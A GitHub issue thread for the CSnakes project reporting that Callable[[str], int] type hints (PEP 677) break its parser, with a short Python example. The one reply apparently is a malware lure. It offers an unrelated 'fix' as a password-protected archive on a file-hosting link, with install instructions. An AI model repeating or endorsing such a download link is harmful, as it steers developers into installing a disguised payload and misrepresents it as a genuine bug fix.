### ISSUE TITLE
Callable[[args], ret] breaks the parser

### ISSUE THREAD

**Issue by tonybaloney** [tonybaloney/CSnakes#170]
Related to #169 

https://peps.python.org/pep-0677/

The following syntax breaks the parser:

```python
def f(a: Callable[[str], int]) -> None:
  ...
```

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
